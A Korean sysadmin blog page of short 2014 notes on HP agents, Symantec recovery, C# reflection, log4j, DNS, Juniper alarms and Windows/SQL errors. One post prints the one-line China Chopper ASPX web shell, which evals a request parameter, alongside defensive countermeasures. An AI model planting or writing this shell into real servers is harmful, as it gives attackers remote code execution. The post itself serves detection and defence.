2014년 12월 22일 월요일

HP Insight Management Agents - Diagram

From  HP.com

 

 

Foundation Agent 는 Windows OS 의 데이터를 수집.
이때,. 레지스트리 접근을 매우 많이 하므로 보안 이벤트로그의 감사 설정시 로그 공간을 소모가 빠름.

 

 



hp-insight-1.png

2014년 12월 15일 월요일

2014년 10월 31일 금요일

Symantec Recovery Disk - Windows 7/8/2008/2012

- 시스템 예약 파티션 (100M~300M)
- 드라이브 파티션 (ex, C / D.....)

1. 시스템 예약 파티션 복원 옵션
- Set drive active(for booting OS)
- Restore master boot record

2. 드라이브 파티션 복원 옵션
- Use Restore Anyware to recover to different hardware (라이센스 필요)
- Restore original disk signature

 

[Anyware restore]
http://www.symantec.com/docs/TECH55329  
http://www.symantec.com/docs/TECH55822
http://www.symantec.com/docs/TECH212105    
Delete Existing Drivers
Prompt for Drivers
Run Windows Mini-Setup

 

 


2014년 10월 8일 수요일

C#, 클래스의 필드(변수) 정보 가져오기


Type type = typeof(object);

System.Reflection.FieldInfo[] f =
    type.GetFields(System.Reflection.BindingFlags.Public |
        System.Reflection.BindingFlags.Static |
        System.Reflection.BindingFlags.Instance);

foreach(System.Reflection.FieldInfo _f in f) {
    Console.WriteLine(_f.Name + ":" + _f.GetValue(null));
}

# Flags 는 해당 클래스내에 선언된 것중에 가져올 타입 지정




2014년 9월 1일 월요일

China Chopper Web Shell

Example, test.aspx
<%@ Page Language="Jscript"%><%eval(Request.Item["memeber"],"unsafe");%>


China Chopper Webshell - the 4KB that Owns your Web Server
http://informationonsecurity.blogspot.kr/2012/11/china-chopper-webshell.html

Breaking Down the China Chopper Web Shell ? Part II
http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

 

- snort 류와 같은 솔루션/장비를 이용한 패킷 패턴 검출
- IIS 에서, .NET 신뢰수준 변경
- 웹사이트 업로드 경로에 허용되지 않은 파일 업로드 체크(코드수준)
- FTP 를 통해서 웹쉘 업로드가 가능하지 않도록 방화벽 제어
- 정기적인 웹쉘 스캔
  ....... 등등등............

 

 


2014년 8월 27일 수요일

log4j, NTEventLogAppender

# log4j.properties
log4j.logger.com.r1soft=INFO, NTEventLog
log4j.appender.NTEventLog=org.apache.log4j.nt.NTEventLogAppender
log4j.appender.NTEventLog.source=r1soft
log4j.appender.NTEventLog.Threshold=WARN

 

 


2014년 8월 8일 금요일

Free Public DNS

Google      8.8.8.8 / 8.8.4.4
Comodo Secure DNS     8.26.56.26 / 8.20.247.20
Norton ConnectSafe      199.85.126.10 / 199.85.127.10
OpenNIC     216.87.84.211 / 23.90.4.6

믿을만한 몇곳....
국내 ISP Cache DNS 는 일부 MX 쿼리 리턴을 이상하게 하는 경우가 있음.

 

 


2014년 7월 10일 목요일

Juniper SSG140 Alarm LED

#Red 상태 시, 발생 원인

  • Hardware component 또는 software module 실패
  • 방화벽 공격이 발견되었을 경우
  • Screen 설정에 의한 Alert 발생과 같은 Alarm 이벤트로그 발생 시

 

#Amber 상태 시, 발생 원인

  • memory 사용량 부족 ( 10% 미만 )
  • CPU의 높은 사용량 ( 90% 이상 )
  • Session full일 경우
  • VPN tunnel의 수가 Maximum일 경우
  • HA(이중화) 상태 변경

 

※ALARM LED (Red/Amber) 상태 해제 명령어

SSG-140 -> clear led alarm

 

 


2014년 6월 24일 화요일

MySQL ODBC 5.3 Driver 설치 오류 error 13 / 126

- Windows Server 2008 R2
- mysql-connector-odbc-5.3.2-winx64.msi

Error 1918.Error installing ODBC driver MySQL ODBC 5.3 ANSI Driver, ODBC error 13:     MySQL ODBC 5.3 ANSI Driver ODBC 드라이버의 설치 루틴을 시스템 오류 코드 126 때문에 로드하지 못했습니다.

지정된 모듈을 찾을 수 없습니다. (C:\Program Files\MySQL\Connector ODBC 5.3\myodbc5S.dll)..  Verify that the file MySQL ODBC 5.3 ANSI Driver exists and that you can access it.

=> msvcr100.dll 를 참조하는데 실제 해당 파일이 없음. 대신 msvcr100_clr0400.dll 으로 존재. msvcr100_clr0400.dll 를 복사하여 msvcr100.dll 으로 이름 변경.

 

 


2014년 3월 3일 월요일

MSSQLSERVER/ ID: 26073

TCP 연결이 닫혔지만 SQL Server의 자식 프로세스에서 연결 소켓의 중복 항목을 보유 중일 수 있습니다. TcpAbortiveClose SQL Server 레지스트리 설정을 사용하도록 설정하고 SQL Server를 다시 시작하십시오. 문제가 계속되면 기술 지원 담당자에게 문의하십시오.

http://support.microsoft.com/kb/307197

 

 

 

 


2014년 2월 7일 금요일

WMI / ID: 5612

할당량이 경고 값에 도달하여 Windows Management Instrumentation에서 WMIPRVSE.EXE를 중지했습니다. 할당량: HandleCount 값: 4098 최대값: 4096 WMIPRVSE PID: 3320 이 프로세스에서 호스트된 공급자: %systemroot%\system32\wbem\wmiprov.dll, C:\Windows\System32\wbem\WmiPerfClass.dll

 

    8: File  (RW-)   C:\Windows\System32
   D8: Section       \BaseNamedObjects\Wmi Provider Sub System Counters
   FC: Section       \BaseNamedObjects\__ComCatalogCache__
  114: Section       \BaseNamedObjects\__ComCatalogCache__
  124: Section       \RPC Control\DSEC110C
 2550: Section       \BaseNamedObjects\GDA:  ESENT Performance Data Schema Version 215
 2A68: Section       \BaseNamedObjects\Cor_Public_IPCBlock_4356
 2C6C: Section       \BaseNamedObjects\WmiReverseAdapterMemory_0
 2C80: Section       \BaseNamedObjects\netfxcustomperfcounters.1.0.net data provider for sqlserver
 2CA8: Section       \BaseNamedObjects\IISCounterControlBlock-.....
 2CCC: Section       \BaseNamedObjects\IISCacheCounters-4b70e2e0-....
 2CEC: Section       \BaseNamedObjects\ASP_PERFMON_BLOCK_00000f18
 2E28: Section       \BaseNamedObjects\MSDTC_STATS_FILE
 2ECC: Section       \BaseNamedObjects\IISSitesCounters-5d0a2dc8-....
 301C: Section       \BaseNamedObjects\netfxcustomperfcounters.1.0.net clr networking
 3068: File  (---)   \Device\Mup
 308C: Section       \BaseNamedObjects\ASP_PERFMON_MAIN_BLOCK
 312C: Section       \LsaPerformance
 3158: Section       \BaseNamedObjects\IISSitesCounters-30cb6cdd....
 31B4: Section       \BaseNamedObjects\IDA1:  ESENT Performance Data Schema Version 215
 3210: File  (R-D)   C:\Windows\System32\ko-KR\utildll.dll.mui
 33CC: Section       \BaseNamedObjects\IISCacheCounters-0338985b-....

 

참고
http://blogs.technet.com/b/askperf/archive/2014/08/12/wmi-how-to-troubleshoot-wmi-high-handle-count.aspx

 

 

 


2014년 1월 18일 토요일

MSSQL / ID: 912

로그 이름:         Application
이벤트 ID:        912
수준:            오류

업그레이드 단계 'u_tables.sql'에서 오류 25641, 상태 0, 심각도 16이(가) 발생하여 데이터베이스 'master'의 스크립트 수준을 업그레이드하지 못했습니다. 이 오류는 일반적인 작업을 수행하지 못하거나 데이터베이스가 오프라인 상태가 될 수도 있는 심각한 상태입니다. 'master' 데이터베이스를 업그레이드하는 동안 이 오류가 발생할 경우에는 전체 SQL Server 인스턴스를 시작할 수 없게 됩니다. 이전 오류 로그 항목에서 오류를 검사하고, 적절한 조치를 취한 후 데이터베이스를 다시 시작하여 스크립트 업그레이드 단계를 완료하십시오.

=> 서비스 계정을 인스턴스 서비스 계정에서 LocalSystem 계정으로

 

 


2019년 12월 MS 취약점 패치 주요 사항

서버 관련 주요 중요 취약점 CVE-2019-1470 | Hyper-V 정보 유출 취약성 https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-1470 CVE...